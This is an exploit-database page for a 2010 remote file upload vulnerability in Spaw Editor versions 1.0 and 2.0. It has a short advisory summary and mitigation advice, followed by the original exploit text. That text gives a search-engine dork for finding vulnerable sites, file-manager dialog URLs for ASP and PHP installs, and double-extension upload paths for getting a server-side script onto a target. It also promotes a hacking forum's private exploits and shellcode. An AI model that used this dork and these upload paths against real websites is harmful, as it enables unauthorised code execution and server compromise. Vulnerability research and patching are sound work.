header-logo
Suggest Exploit
vendor:
Spaw Editor
by:
Ma3sTr0-Dz
7.5
CVSS
HIGH
Remote File Upload
CWE
Product Name: Spaw Editor
Affected Version From: 1
Affected Version To: 2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows, Linux
2010

Spaw Editor v1.0 & 2.0 Remote File Upload

The Spaw Editor versions 1.0 and 2.0 are vulnerable to remote file upload. The exploit allows attackers to upload arbitrary files to the server. This can lead to remote code execution or unauthorized access to sensitive information.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of Spaw Editor and apply any available patches. Additionally, ensure proper file upload validation and restrict file types and sizes.
Source

Exploit-DB raw data:

# Tilte: Spaw Editor v1.0 & 2.0 Remote File Upload .

# Date....................: [20-05-2010]
# Author..................: [Ma3sTr0-Dz]
# Location ...............: [Algeria]
# Software ...............: [Spaw Editor v1 & v2] 
# Impact..................: [Remote]
# Site Software ..........: [http://www.spaweditor.com]
# Sptnx ..................: [CmOs_Clr & Sec4ever Memberz.]
# Home : .................: [Www.Sec4ever.Com/home/ For Latest 2010 Localz & priv8 Exploits !]
# Contact me : ...........: [o5m@hotmail.de]

# Vulnerability: Remote File Upload .

# Part ExplOit & Bug Codes :

Dork [ allinurl:spaw2/dialogs/ ]

Exploit :

For Windows & ASP Sites : 

/spaw2/dialogs/dialog.aspx?module=spawfm&dialog=spawfm&theme=spaw2〈=en&charset=utf-8&scid=2d0650b7920a4fbf87598f8d58b4a99b&type=images

/spaw2/uploads/files/sec4ever.asp;.jpg

=====================================

For Linux PHP :

/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2〈=en&charset=utf-8&scid=2d0650b7920a4fbf87598f8d58b4a99b&type=files

/spaw2/uploads/files/sec4ever.jpg.php

=====================================

Special Thanks to : Exploit-db Team &  Www.Sec4ever.com/home [ Latest Shellcodez - Security News - Priv8 Exploits &
 Localz ] .

Navigation

Suggest Exploit

Services By CQR